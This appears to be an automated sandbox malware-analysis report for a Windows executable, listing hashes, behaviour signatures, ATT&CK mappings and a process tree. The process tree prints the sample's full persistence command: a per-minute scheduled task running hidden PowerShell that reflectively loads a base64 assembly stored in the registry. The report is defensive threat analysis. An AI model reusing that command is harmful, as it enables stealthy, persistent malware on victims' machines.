f5564113679c153eede888e94c38cd488d9db13f6659adfe37b627329fd8d257

General

Target

f5564113679c153eede888e94c38cd488d9db13f6659adfe37b627329fd8d257.exe
Size

269KB
MD5

3ca79ae3cffbbe1a16276e6b6d9d075e
SHA1

1ed1cccc911ad67252a7b1c72d046dfb8042ec34
SHA256

f5564113679c153eede888e94c38cd488d9db13f6659adfe37b627329fd8d257
SHA512

a011c4fade25ba3a640150ab9fbcf8ef8b0ed97ffa25fccecac2e992f3189e5b3014396c46986db43387ff6dcb0d522185c9d9aa36b4e8e602bba54779add9af

Score

5^/10

Malware Config

Signatures

Drops file in System32 directory 1 IoCs

Processes:

powershell.EXE

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1640 schtasks.exe
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.EXE

pid process

972 powershell.EXE
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.EXE

description pid process

Token: SeDebugPrivilege 972 powershell.EXE

pid	process
1640	schtasks.exe

pid	process
972	powershell.EXE

description	pid	process
Token: SeDebugPrivilege	972	powershell.EXE

Suspicious use of WriteProcessMemory 7 IoCs

Processes:

f5564113679c153eede888e94c38cd488d9db13f6659adfe37b627329fd8d257.exetaskeng.exe

description	pid	process	target process
PID 1144 wrote to memory of 1640	1144	f5564113679c153eede888e94c38cd488d9db13f6659adfe37b627329fd8d257.exe	schtasks.exe
PID 1144 wrote to memory of 1640	1144	f5564113679c153eede888e94c38cd488d9db13f6659adfe37b627329fd8d257.exe	schtasks.exe
PID 1144 wrote to memory of 1640	1144	f5564113679c153eede888e94c38cd488d9db13f6659adfe37b627329fd8d257.exe	schtasks.exe
PID 1144 wrote to memory of 1640	1144	f5564113679c153eede888e94c38cd488d9db13f6659adfe37b627329fd8d257.exe	schtasks.exe
PID 1388 wrote to memory of 972	1388	taskeng.exe	powershell.EXE
PID 1388 wrote to memory of 972	1388	taskeng.exe	powershell.EXE
PID 1388 wrote to memory of 972	1388	taskeng.exe	powershell.EXE

C:\Users\Admin\AppData\Local\Temp\f5564113679c153eede888e94c38cd488d9db13f6659adfe37b627329fd8d257.exe
"C:\Users\Admin\AppData\Local\Temp\f5564113679c153eede888e94c38cd488d9db13f6659adfe37b627329fd8d257.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1144

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn "Test" /tr "powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [Reflection.Assembly]::Load([System.Convert]::Frombase64String((Get-ItemProperty HKCU:\Software).Values)).EntryPoint.Invoke($null,$null)::[Reflection.Assembly]"
2⤵
- Creates scheduled task(s)
PID:1640

C:\Windows\system32\taskeng.exe
taskeng.exe {FC9274DB-A806-46B0-907C-CB63F605C6B0} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:1388

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [Reflection.Assembly]::Load([System.Convert]::Frombase64String((Get-ItemProperty HKCU:\Software).Values)).EntryPoint.Invoke($null,$null)::[Reflection.Assembly]
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:972

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/972-56-0x0000000000000000-mapping.dmp

Download
memory/972-57-0x000007FEFC011000-0x000007FEFC013000-memory.dmp

Filesize
8KB

Download
memory/972-59-0x0000000001F40000-0x0000000001F42000-memory.dmp

Filesize
8KB

Download
memory/972-60-0x0000000001F42000-0x0000000001F44000-memory.dmp

Filesize
8KB

Download
memory/972-61-0x0000000001F44000-0x0000000001F47000-memory.dmp

Filesize
12KB

Download
memory/972-58-0x000007FEF2940000-0x000007FEF349D000-memory.dmp

Filesize
11.4MB

Download
memory/972-62-0x000000001B740000-0x000000001BA3F000-memory.dmp

Filesize
3.0MB

Download
memory/972-63-0x0000000001F4B000-0x0000000001F6A000-memory.dmp

Filesize
124KB

Download
memory/972-64-0x000007FEECFA0000-0x000007FEEE036000-memory.dmp

Filesize
16.6MB

Download
memory/1144-53-0x00000000003E0000-0x00000000003E1000-memory.dmp

Filesize
4KB

Download
memory/1640-55-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads